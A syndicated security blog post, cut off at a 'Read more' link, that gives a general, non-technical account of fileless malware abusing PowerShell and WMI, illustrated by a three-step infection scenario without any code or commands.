What would you say if I told you that now a hacker doesn’t even have to trick you into installing malicious files on your computer in order to steal sensitive data? Let’s take a look at how this form of (non-) malware works and, more importantly, how to protect yourself against it.
So how does this fileless malware attack occur?
The big picture involves taking control of legitimate Windows tools like PowerShell and Windows Management Instrumentation (WMI) and then undertaking nefarious activity at the command-line level. The sneaky part is that since PowerShell is such a trusted component of Windows, most security scans don’t check it. Meanwhile, once in the system by following the path of least resistance, the perpetrator can retrieve sensitive data and migrate to other machines on the network at their leisure.
Let’s look at an example of how this might happen.
Step 1: Perhaps at the behest of a clever spam message promising untold riches, a user clicks on a link and visits a website.
Step 2: When Flash player loads, the fix is in.
Step 3: Flash accesses PowerShell, and from here, operating only in the computer’s memory, instructions go through the command line. Those instructions tell it to download a malicious PowerShell script specializing in collecting sensitive data and sending it back to its creator.
And there you go! Never once in the process did the criminal have to figure out how to sneak a malicious program past antivirus and malware defense. This is a big deal.
Why Fileless Malware Now?
The reason sophisticated cyber criminals have shifted their focus away from popular malware strategies like brute force automated login attempts or sneaky spear phishing schemes is simple: traditional antivirus and anti-malware security aren’t even looking where these fileless malware attacks are going. They (Read more...)
This is a Security Bloggers Network syndicated blog post authored by Tripwire Guest Authors. Read the original post at: The State of Security